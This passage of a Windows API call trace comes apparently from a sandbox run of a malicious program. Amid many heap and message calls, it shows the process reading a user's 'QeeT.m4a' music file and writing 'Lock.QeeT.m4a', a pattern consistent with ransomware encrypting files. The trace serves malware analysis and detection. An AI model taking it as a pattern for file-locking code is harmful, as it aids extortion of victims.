hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qeet.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0252.420] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.420] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0252.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0252.420] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.420] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.420] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.QeeT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.qeet.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0252.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0252.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0252.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0252.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.422] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0252.422] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0252.425] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x1122, lpOverlapped=0x0) returned 1 [0252.425] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0252.426] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11122) returned 0x34c2258 [0252.427] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.427] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.427] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0252.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0252.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0252.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11122) returned 0x34c2258 [0252.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11122) returned 0x24b7a48 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.430] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.431] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.431] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.431] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.432] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.433] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.433] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.434] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.434] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.434] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.435] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.435] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.435] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.435] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.435] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.436] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.436] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: 